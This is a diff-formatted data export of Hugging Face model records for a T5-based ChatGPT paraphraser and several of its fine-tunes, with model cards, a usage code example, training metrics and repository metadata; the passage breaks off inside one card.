|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
model_id,card,metadata,depth,children,children_count,adapters,adapters_count,quantized,quantized_count,merges,merges_count,spaces,spaces_count
|
| 2 |
+
humarin/chatgpt_paraphraser_on_T5_base,"---
|
| 3 |
+
license: openrail
|
| 4 |
+
datasets:
|
| 5 |
+
- humarin/chatgpt-paraphrases
|
| 6 |
+
language:
|
| 7 |
+
- en
|
| 8 |
+
library_name: transformers
|
| 9 |
+
inference:
|
| 10 |
+
parameters:
|
| 11 |
+
num_beams: 5
|
| 12 |
+
num_beam_groups: 5
|
| 13 |
+
num_return_sequences: 5
|
| 14 |
+
repetition_penalty: 10.01
|
| 15 |
+
diversity_penalty: 3.01
|
| 16 |
+
no_repeat_ngram_size: 2
|
| 17 |
+
temperature: 0.7
|
| 18 |
+
max_length: 128
|
| 19 |
+
widget:
|
| 20 |
+
- text: What are the best places to see in New York?
|
| 21 |
+
example_title: New York tourist attractions
|
| 22 |
+
- text: When should I go to the doctor?
|
| 23 |
+
example_title: Doctor's time
|
| 24 |
+
- text: >-
|
| 25 |
+
Rammstein's album Mutter was recorded in the south of France in May and June
|
| 26 |
+
2000, and mixed in Stockholm in October of that year.
|
| 27 |
+
example_title: Rammstein's album Mutter
|
| 28 |
+
pipeline_tag: text2text-generation
|
| 29 |
+
---
|
| 30 |
+
This model was trained on our [ChatGPT paraphrase dataset](https://huggingface.co/datasets/humarin/chatgpt-paraphrases).
|
| 31 |
+
|
| 32 |
+
This dataset is based on the [Quora paraphrase question](https://www.kaggle.com/competitions/quora-question-pairs), texts from the [SQUAD 2.0](https://huggingface.co/datasets/squad_v2) and the [CNN news dataset](https://huggingface.co/datasets/cnn_dailymail).
|
| 33 |
+
|
| 34 |
+
This model is based on the T5-base model. We used ""transfer learning"" to get our model to generate paraphrases as well as ChatGPT. Now we can say that this is one of the best paraphrases of the Hugging Face.
|
| 35 |
+
|
| 36 |
+
[Kaggle](https://www.kaggle.com/datasets/vladimirvorobevv/chatgpt-paraphrases) link
|
| 37 |
+
|
| 38 |
+
[Author's 1 LinkedIn](https://www.linkedin.com/in/vladimir-vorobev/) link
|
| 39 |
+
[Author's 2 LinkedIn](https://www.linkedin.com/in/makual/) link
|
| 40 |
+
|
| 41 |
+
## Deploying example
|
| 42 |
+
```python
|
| 43 |
+
from transformers import AutoTokenizer, AutoModelForSeq2SeqLM
|
| 44 |
+
|
| 45 |
+
device = ""cuda""
|
| 46 |
+
|
| 47 |
+
tokenizer = AutoTokenizer.from_pretrained(""humarin/chatgpt_paraphraser_on_T5_base"")
|
| 48 |
+
|
| 49 |
+
model = AutoModelForSeq2SeqLM.from_pretrained(""humarin/chatgpt_paraphraser_on_T5_base"").to(device)
|
| 50 |
+
|
| 51 |
+
def paraphrase(
|
| 52 |
+
question,
|
| 53 |
+
num_beams=5,
|
| 54 |
+
num_beam_groups=5,
|
| 55 |
+
num_return_sequences=5,
|
| 56 |
+
repetition_penalty=10.0,
|
| 57 |
+
diversity_penalty=3.0,
|
| 58 |
+
no_repeat_ngram_size=2,
|
| 59 |
+
temperature=0.7,
|
| 60 |
+
max_length=128
|
| 61 |
+
):
|
| 62 |
+
input_ids = tokenizer(
|
| 63 |
+
f'paraphrase: {question}',
|
| 64 |
+
return_tensors=""pt"", padding=""longest"",
|
| 65 |
+
max_length=max_length,
|
| 66 |
+
truncation=True,
|
| 67 |
+
).input_ids.to(device)
|
| 68 |
+
|
| 69 |
+
outputs = model.generate(
|
| 70 |
+
input_ids, temperature=temperature, repetition_penalty=repetition_penalty,
|
| 71 |
+
num_return_sequences=num_return_sequences, no_repeat_ngram_size=no_repeat_ngram_size,
|
| 72 |
+
num_beams=num_beams, num_beam_groups=num_beam_groups,
|
| 73 |
+
max_length=max_length, diversity_penalty=diversity_penalty
|
| 74 |
+
)
|
| 75 |
+
|
| 76 |
+
res = tokenizer.batch_decode(outputs, skip_special_tokens=True)
|
| 77 |
+
|
| 78 |
+
return res
|
| 79 |
+
```
|
| 80 |
+
|
| 81 |
+
## Usage examples
|
| 82 |
+
|
| 83 |
+
**Input:**
|
| 84 |
+
```python
|
| 85 |
+
text = 'What are the best places to see in New York?'
|
| 86 |
+
paraphrase(text)
|
| 87 |
+
```
|
| 88 |
+
**Output:**
|
| 89 |
+
```python
|
| 90 |
+
['What are some must-see places in New York?',
|
| 91 |
+
'Can you suggest some must-see spots in New York?',
|
| 92 |
+
'Where should one go to experience the best NYC has to offer?',
|
| 93 |
+
'Which places should I visit in New York?',
|
| 94 |
+
'What are the top destinations to explore in New York?']
|
| 95 |
+
```
|
| 96 |
+
|
| 97 |
+
**Input:**
|
| 98 |
+
```python
|
| 99 |
+
text = ""Rammstein's album Mutter was recorded in the south of France in May and June 2000, and mixed in Stockholm in October of that year.""
|
| 100 |
+
paraphrase(text)
|
| 101 |
+
```
|
| 102 |
+
**Output:**
|
| 103 |
+
```python
|
| 104 |
+
['In May and June 2000, Rammstein travelled to the south of France to record his album Mutter, which was mixed in Stockholm in October of that year.',
|
| 105 |
+
'The album Mutter by Rammstein was recorded in the south of France during May and June 2000, with mixing taking place in Stockholm in October of that year.',
|
| 106 |
+
'The album Mutter by Rammstein was recorded in the south of France during May and June 2000, with mixing taking place in Stockholm in October of that year. It',
|
| 107 |
+
'Mutter, the album released by Rammstein, was recorded in southern France during May and June 2000, with mixing taking place between October and September.',
|
| 108 |
+
'In May and June 2000, Rammstein recorded his album Mutter in the south of France, with the mix being made at Stockholm during October.']
|
| 109 |
+
```
|
| 110 |
+
|
| 111 |
+
|
| 112 |
+
## Train parameters
|
| 113 |
+
```python
|
| 114 |
+
epochs = 5
|
| 115 |
+
batch_size = 64
|
| 116 |
+
max_length = 128
|
| 117 |
+
lr = 5e-5
|
| 118 |
+
batches_qty = 196465
|
| 119 |
+
betas = (0.9, 0.999)
|
| 120 |
+
eps = 1e-08
|
| 121 |
+
```
|
| 122 |
+
|
| 123 |
+
### BibTeX entry and citation info
|
| 124 |
+
|
| 125 |
+
```bibtex
|
| 126 |
+
@inproceedings{chatgpt_paraphraser,
|
| 127 |
+
author={Vladimir Vorobev, Maxim Kuznetsov},
|
| 128 |
+
title={A paraphrasing model based on ChatGPT paraphrases},
|
| 129 |
+
year={2023}
|
| 130 |
+
}
|
| 131 |
+
```","{""id"": ""humarin/chatgpt_paraphraser_on_T5_base"", ""author"": ""humarin"", ""sha"": ""e8b5ba0ccb3e3c00c71b005bb9e02b7603a35664"", ""last_modified"": ""2024-08-01 22:57:03+00:00"", ""created_at"": ""2023-03-17 18:22:37+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 115963, ""downloads_all_time"": null, ""likes"": 185, ""library_name"": ""transformers"", ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""transformers"", ""pytorch"", ""t5"", ""text2text-generation"", ""en"", ""dataset:humarin/chatgpt-paraphrases"", ""license:openrail"", ""autotrain_compatible"", ""text-generation-inference"", ""endpoints_compatible"", ""region:us""], ""pipeline_tag"": ""text2text-generation"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""datasets:\n- humarin/chatgpt-paraphrases\nlanguage:\n- en\nlibrary_name: transformers\nlicense: openrail\npipeline_tag: text2text-generation\ninference:\n parameters:\n num_beams: 5\n num_beam_groups: 5\n num_return_sequences: 5\n repetition_penalty: 10.01\n diversity_penalty: 3.01\n no_repeat_ngram_size: 2\n temperature: 0.7\n max_length: 128\nwidget:\n- text: What are the best places to see in New York?\n example_title: New York tourist attractions\n- text: When should I go to the doctor?\n example_title: Doctor's time\n- text: Rammstein's album Mutter was recorded in the south of France in May and June\n 2000, and mixed in Stockholm in October of that year.\n example_title: Rammstein's album Mutter"", ""widget_data"": [{""text"": ""What are the best places to see in New York?"", ""example_title"": ""New York tourist attractions""}, {""text"": ""When should I go to the doctor?"", ""example_title"": ""Doctor's time""}, {""text"": ""Rammstein's album Mutter was recorded in the south of France in May and June 2000, and mixed in Stockholm in October of that year."", ""example_title"": ""Rammstein's album Mutter""}], ""model_index"": null, ""config"": {""architectures"": [""T5ForConditionalGeneration""], ""model_type"": ""t5"", ""tokenizer_config"": {""eos_token"": ""</s>"", ""pad_token"": ""<pad>"", ""unk_token"": ""<unk>""}}, ""transformers_info"": {""auto_model"": ""AutoModelForSeq2SeqLM"", ""custom_class"": null, ""pipeline_tag"": ""text2text-generation"", ""processor"": ""AutoTokenizer""}, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='generation_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='pytorch_model.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='special_tokens_map.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='spiece.model', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer_config.json', size=None, blob_id=None, lfs=None)""], ""spaces"": [""JenkinsGage/WritingHelper"", ""sohomghosh/FinLanSer_Financial_Language_Simplifier"", ""Amitontheweb/InstaoffyzFreeParaphraser"", ""Leonidasiy/NLP-Toolbox"", ""bitcool/humarin-chatgpt_paraphraser_on_T5_base"", ""jgyasu/aiisc-watermarking-model"", ""Xfiles/humarin-chatgpt_paraphraser_on_T5_base"", ""trhacknon/humarin-chatgpt_paraphraser_on_T5_base"", ""prlabs2023/paraphrasing-1"", ""Bazedgul/ChatGPT"", ""Prezily/humarin-chatgpt_paraphraser_on_T5_base"", ""TrungTech/Financial_Sentiment_Analysis_with_BERT"", ""aisafe/SCA"", ""Towhidul/PECCAVI"", ""Adiityaaa/humarin-chatgpt_paraphraser_on_T5_base"", ""Unityraptor/MediaRephraser"", ""jigyasu2/Text_Paraphraser_and_Non-melting_Points_Highlighter"", ""colllm/humarin-chatgpt_paraphraser_on_T5_base"", ""deb1265/humarin-chatgpt_paraphraser_on_T5_base"", ""NoaiGPT/NoaiGPT-777"", ""Amitontheweb/Text_Paraphraser_Title_Generator"", ""BACKENDAPI2024/aiisc-watermarking-modelv3"", ""IdenGhost/humarin-chatgpt_paraphraser_on_T5_base"", ""JoeArmani/csc525_retrieval_based_chatbot"", ""ravindravala/humaniser"", ""Karthick1087/RapidHumanizeAI"", ""hotech/sampepper"", ""RafaelLima777/humarin-chatgpt_paraphraser_on_T5_base""], ""safetensors"": null, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2024-08-01 22:57:03+00:00"", ""cardData"": ""datasets:\n- humarin/chatgpt-paraphrases\nlanguage:\n- en\nlibrary_name: transformers\nlicense: openrail\npipeline_tag: text2text-generation\ninference:\n parameters:\n num_beams: 5\n num_beam_groups: 5\n num_return_sequences: 5\n repetition_penalty: 10.01\n diversity_penalty: 3.01\n no_repeat_ngram_size: 2\n temperature: 0.7\n max_length: 128\nwidget:\n- text: What are the best places to see in New York?\n example_title: New York tourist attractions\n- text: When should I go to the doctor?\n example_title: Doctor's time\n- text: Rammstein's album Mutter was recorded in the south of France in May and June\n 2000, and mixed in Stockholm in October of that year.\n example_title: Rammstein's album Mutter"", ""transformersInfo"": {""auto_model"": ""AutoModelForSeq2SeqLM"", ""custom_class"": null, ""pipeline_tag"": ""text2text-generation"", ""processor"": ""AutoTokenizer""}, ""_id"": ""6414afedb6e553f665e31c26"", ""modelId"": ""humarin/chatgpt_paraphraser_on_T5_base"", ""usedStorage"": 8917528089}",0,"https://huggingface.co/codingfaf/paraSci, https://huggingface.co/codingfaf/paraSc_last_two_layers, https://huggingface.co/jaesani/chat_gpt_and_t5_base_paraphraser, https://huggingface.co/TimeDom/Snake",4,"https://huggingface.co/Adiel13ad/Sandboxia, https://huggingface.co/kumar6591/AI",2,"https://huggingface.co/Felladrin/onnx-chatgpt_paraphraser_on_T5_base, https://huggingface.co/nvhf/chatgpt_paraphraser_on_T5_base-Q6_K-GGUF",2,,0,"Amitontheweb/InstaoffyzFreeParaphraser, BACKENDAPI2024/aiisc-watermarking-modelv3, JenkinsGage/WritingHelper, Karthick1087/RapidHumanizeAI, Leonidasiy/NLP-Toolbox, RafaelLima777/humarin-chatgpt_paraphraser_on_T5_base, Xfiles/humarin-chatgpt_paraphraser_on_T5_base, aisafe/SCA, bitcool/humarin-chatgpt_paraphraser_on_T5_base, huggingface/InferenceSupport/discussions/new?title=humarin/chatgpt_paraphraser_on_T5_base&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5Bhumarin%2Fchatgpt_paraphraser_on_T5_base%5D(%2Fhumarin%2Fchatgpt_paraphraser_on_T5_base)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A, jgyasu/aiisc-watermarking-model, ravindravala/humaniser, sohomghosh/FinLanSer_Financial_Language_Simplifier",13
|
| 132 |
+
codingfaf/paraSci,"---
|
| 133 |
+
license: openrail
|
| 134 |
+
base_model: humarin/chatgpt_paraphraser_on_T5_base
|
| 135 |
+
tags:
|
| 136 |
+
- generated_from_keras_callback
|
| 137 |
+
model-index:
|
| 138 |
+
- name: codingfaf/paraSci
|
| 139 |
+
results: []
|
| 140 |
+
---
|
| 141 |
+
|
| 142 |
+
<!-- This model card has been generated automatically according to the information Keras had access to. You should
|
| 143 |
+
probably proofread and complete it, then remove this comment. -->
|
| 144 |
+
|
| 145 |
+
# codingfaf/paraSci
|
| 146 |
+
|
| 147 |
+
This model is a fine-tuned version of [humarin/chatgpt_paraphraser_on_T5_base](https://huggingface.co/humarin/chatgpt_paraphraser_on_T5_base) on an unknown dataset.
|
| 148 |
+
It achieves the following results on the evaluation set:
|
| 149 |
+
- Train Loss: 2.2367
|
| 150 |
+
- Validation Loss: 2.0908
|
| 151 |
+
- Epoch: 4
|
| 152 |
+
|
| 153 |
+
## Model description
|
| 154 |
+
|
| 155 |
+
More information needed
|
| 156 |
+
|
| 157 |
+
## Intended uses & limitations
|
| 158 |
+
|
| 159 |
+
More information needed
|
| 160 |
+
|
| 161 |
+
## Training and evaluation data
|
| 162 |
+
|
| 163 |
+
More information needed
|
| 164 |
+
|
| 165 |
+
## Training procedure
|
| 166 |
+
|
| 167 |
+
### Training hyperparameters
|
| 168 |
+
|
| 169 |
+
The following hyperparameters were used during training:
|
| 170 |
+
- optimizer: {'name': 'AdamWeightDecay', 'learning_rate': 2e-05, 'decay': 0.0, 'beta_1': 0.9, 'beta_2': 0.999, 'epsilon': 1e-07, 'amsgrad': False, 'weight_decay_rate': 0.01}
|
| 171 |
+
- training_precision: float32
|
| 172 |
+
|
| 173 |
+
### Training results
|
| 174 |
+
|
| 175 |
+
| Train Loss | Validation Loss | Epoch |
|
| 176 |
+
|:----------:|:---------------:|:-----:|
|
| 177 |
+
| 2.9673 | 2.3630 | 0 |
|
| 178 |
+
| 2.5094 | 2.2455 | 1 |
|
| 179 |
+
| 2.3836 | 2.1726 | 2 |
|
| 180 |
+
| 2.3024 | 2.1257 | 3 |
|
| 181 |
+
| 2.2367 | 2.0908 | 4 |
|
| 182 |
+
|
| 183 |
+
|
| 184 |
+
### Framework versions
|
| 185 |
+
|
| 186 |
+
- Transformers 4.35.2
|
| 187 |
+
- TensorFlow 2.15.0
|
| 188 |
+
- Datasets 2.16.1
|
| 189 |
+
- Tokenizers 0.15.0
|
| 190 |
+
","{""id"": ""codingfaf/paraSci"", ""author"": ""codingfaf"", ""sha"": ""b6aa207c5c8893a404b7443715eebc8e5b1a6963"", ""last_modified"": ""2024-01-24 07:26:41+00:00"", ""created_at"": ""2024-01-20 20:39:51+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 0, ""downloads_all_time"": null, ""likes"": 0, ""library_name"": ""transformers"", ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""transformers"", ""tf"", ""t5"", ""text2text-generation"", ""generated_from_keras_callback"", ""base_model:humarin/chatgpt_paraphraser_on_T5_base"", ""base_model:finetune:humarin/chatgpt_paraphraser_on_T5_base"", ""license:openrail"", ""autotrain_compatible"", ""endpoints_compatible"", ""region:us""], ""pipeline_tag"": ""text2text-generation"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model: humarin/chatgpt_paraphraser_on_T5_base\nlicense: openrail\ntags:\n- generated_from_keras_callback\nmodel-index:\n- name: codingfaf/paraSci\n results: []"", ""widget_data"": null, ""model_index"": [{""name"": ""codingfaf/paraSci"", ""results"": []}], ""config"": {""architectures"": [""T5ForConditionalGeneration""], ""model_type"": ""t5"", ""tokenizer_config"": {""eos_token"": ""</s>"", ""pad_token"": ""<pad>"", ""unk_token"": ""<unk>""}}, ""transformers_info"": {""auto_model"": ""AutoModelForSeq2SeqLM"", ""custom_class"": null, ""pipeline_tag"": ""text2text-generation"", ""processor"": ""AutoTokenizer""}, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='generation_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='special_tokens_map.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='spiece.model', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tf_model.h5', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer_config.json', size=None, blob_id=None, lfs=None)""], ""spaces"": [], ""safetensors"": null, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2024-01-24 07:26:41+00:00"", ""cardData"": ""base_model: humarin/chatgpt_paraphraser_on_T5_base\nlicense: openrail\ntags:\n- generated_from_keras_callback\nmodel-index:\n- name: codingfaf/paraSci\n results: []"", ""transformersInfo"": {""auto_model"": ""AutoModelForSeq2SeqLM"", ""custom_class"": null, ""pipeline_tag"": ""text2text-generation"", ""processor"": ""AutoTokenizer""}, ""_id"": ""65ac2f97b0b0876790f09501"", ""modelId"": ""codingfaf/paraSci"", ""usedStorage"": 9497113312}",1,,0,,0,,0,,0,huggingface/InferenceSupport/discussions/new?title=codingfaf/paraSci&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5Bcodingfaf%2FparaSci%5D(%2Fcodingfaf%2FparaSci)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A,1
|
| 191 |
+
codingfaf/paraSc_last_two_layers,"---
|
| 192 |
+
license: openrail
|
| 193 |
+
base_model: humarin/chatgpt_paraphraser_on_T5_base
|
| 194 |
+
tags:
|
| 195 |
+
- generated_from_keras_callback
|
| 196 |
+
model-index:
|
| 197 |
+
- name: codingfaf/paraSc_last_two_layers
|
| 198 |
+
results: []
|
| 199 |
+
---
|
| 200 |
+
|
| 201 |
+
<!-- This model card has been generated automatically according to the information Keras had access to. You should
|
| 202 |
+
probably proofread and complete it, then remove this comment. -->
|
| 203 |
+
|
| 204 |
+
# codingfaf/paraSc_last_two_layers
|
| 205 |
+
|
| 206 |
+
This model is a fine-tuned version of [humarin/chatgpt_paraphraser_on_T5_base](https://huggingface.co/humarin/chatgpt_paraphraser_on_T5_base) on an unknown dataset.
|
| 207 |
+
It achieves the following results on the evaluation set:
|
| 208 |
+
- Train Loss: 2.5083
|
| 209 |
+
- Validation Loss: 2.2250
|
| 210 |
+
- Epoch: 1
|
| 211 |
+
|
| 212 |
+
## Model description
|
| 213 |
+
|
| 214 |
+
More information needed
|
| 215 |
+
|
| 216 |
+
## Intended uses & limitations
|
| 217 |
+
|
| 218 |
+
More information needed
|
| 219 |
+
|
| 220 |
+
## Training and evaluation data
|
| 221 |
+
|
| 222 |
+
More information needed
|
| 223 |
+
|
| 224 |
+
## Training procedure
|
| 225 |
+
|
| 226 |
+
### Training hyperparameters
|
| 227 |
+
|
| 228 |
+
The following hyperparameters were used during training:
|
| 229 |
+
- optimizer: {'name': 'AdamWeightDecay', 'learning_rate': 2e-05, 'decay': 0.0, 'beta_1': 0.9, 'beta_2': 0.999, 'epsilon': 1e-07, 'amsgrad': False, 'weight_decay_rate': 0.01}
|
| 230 |
+
- training_precision: float32
|
| 231 |
+
|
| 232 |
+
### Training results
|
| 233 |
+
|
| 234 |
+
| Train Loss | Validation Loss | Epoch |
|
| 235 |
+
|:----------:|:---------------:|:-----:|
|
| 236 |
+
| 2.9613 | 2.3511 | 0 |
|
| 237 |
+
| 2.5083 | 2.2250 | 1 |
|
| 238 |
+
|
| 239 |
+
|
| 240 |
+
### Framework versions
|
| 241 |
+
|
| 242 |
+
- Transformers 4.35.2
|
| 243 |
+
- TensorFlow 2.15.0
|
| 244 |
+
- Datasets 2.16.1
|
| 245 |
+
- Tokenizers 0.15.1
|
| 246 |
+
","{""id"": ""codingfaf/paraSc_last_two_layers"", ""author"": ""codingfaf"", ""sha"": ""63843dc40eb1e2d1d298088b2826e4c1f9ff174b"", ""last_modified"": ""2024-01-28 02:15:35+00:00"", ""created_at"": ""2024-01-26 12:49:21+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 0, ""downloads_all_time"": null, ""likes"": 0, ""library_name"": ""transformers"", ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""transformers"", ""tf"", ""t5"", ""text2text-generation"", ""generated_from_keras_callback"", ""base_model:humarin/chatgpt_paraphraser_on_T5_base"", ""base_model:finetune:humarin/chatgpt_paraphraser_on_T5_base"", ""license:openrail"", ""autotrain_compatible"", ""endpoints_compatible"", ""region:us""], ""pipeline_tag"": ""text2text-generation"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model: humarin/chatgpt_paraphraser_on_T5_base\nlicense: openrail\ntags:\n- generated_from_keras_callback\nmodel-index:\n- name: codingfaf/paraSc_last_two_layers\n results: []"", ""widget_data"": null, ""model_index"": [{""name"": ""codingfaf/paraSc_last_two_layers"", ""results"": []}], ""config"": {""architectures"": [""T5ForConditionalGeneration""], ""model_type"": ""t5"", ""tokenizer_config"": {""eos_token"": ""</s>"", ""pad_token"": ""<pad>"", ""unk_token"": ""<unk>""}}, ""transformers_info"": {""auto_model"": ""AutoModelForSeq2SeqLM"", ""custom_class"": null, ""pipeline_tag"": ""text2text-generation"", ""processor"": ""AutoTokenizer""}, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='generation_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='special_tokens_map.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='spiece.model', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tf_model.h5', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer_config.json', size=None, blob_id=None, lfs=None)""], ""spaces"": [], ""safetensors"": null, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2024-01-28 02:15:35+00:00"", ""cardData"": ""base_model: humarin/chatgpt_paraphraser_on_T5_base\nlicense: openrail\ntags:\n- generated_from_keras_callback\nmodel-index:\n- name: codingfaf/paraSc_last_two_layers\n results: []"", ""transformersInfo"": {""auto_model"": ""AutoModelForSeq2SeqLM"", ""custom_class"": null, ""pipeline_tag"": ""text2text-generation"", ""processor"": ""AutoTokenizer""}, ""_id"": ""65b3aa51f32c79fea7c23d90"", ""modelId"": ""codingfaf/paraSc_last_two_layers"", ""usedStorage"": 6538055944}",1,,0,,0,,0,,0,huggingface/InferenceSupport/discussions/new?title=codingfaf/paraSc_last_two_layers&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5Bcodingfaf%2FparaSc_last_two_layers%5D(%2Fcodingfaf%2FparaSc_last_two_layers)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A,1
|
| 247 |
+
jaesani/chat_gpt_and_t5_base_paraphraser,"---
|
| 248 |
+
language: en
|
| 249 |
+
thumbnail: https://example.com/thumbnail.png
|
| 250 |
+
tags:
|
| 251 |
+
- paraphrasing
|
| 252 |
+
- T5
|
| 253 |
+
- text generation
|
| 254 |
+
- NLP
|
| 255 |
+
- transformers
|
| 256 |
+
license: mit
|
| 257 |
+
datasets:
|
| 258 |
+
- mteb/quora
|
| 259 |
+
metrics:
|
| 260 |
+
- accuracy
|
| 261 |
+
base_model:
|
| 262 |
+
- humarin/chatgpt_paraphraser_on_T5_base
|
| 263 |
+
library_name: transformers
|
| 264 |
+
---
|
| 265 |
+
|
| 266 |
+
# ChatGPT and T5 Base Paraphraser
|
| 267 |
+
|
| 268 |
+
This model is a fine-tuned version of the T5 transformer model designed for paraphrasing questions using the ChatGPT architecture.
|
| 269 |
+
|
| 270 |
+
## Model Description
|
| 271 |
+
|
| 272 |
+
The `chat_gpt_and_t5_base_paraphraser` model is trained to generate paraphrased versions of input questions by utilizing a sequence-to-sequence approach. The model leverages the T5 architecture and has been fine-tuned on the Quora Question-Answer dataset to improve its ability to create diverse and meaningful paraphrases.
|
| 273 |
+
|
| 274 |
+
## Intended Use
|
| 275 |
+
|
| 276 |
+
This model is intended for applications where paraphrasing of text is required, such as:
|
| 277 |
+
|
| 278 |
+
- Chatbots
|
| 279 |
+
- Question-answering systems
|
| 280 |
+
- Content generation
|
| 281 |
+
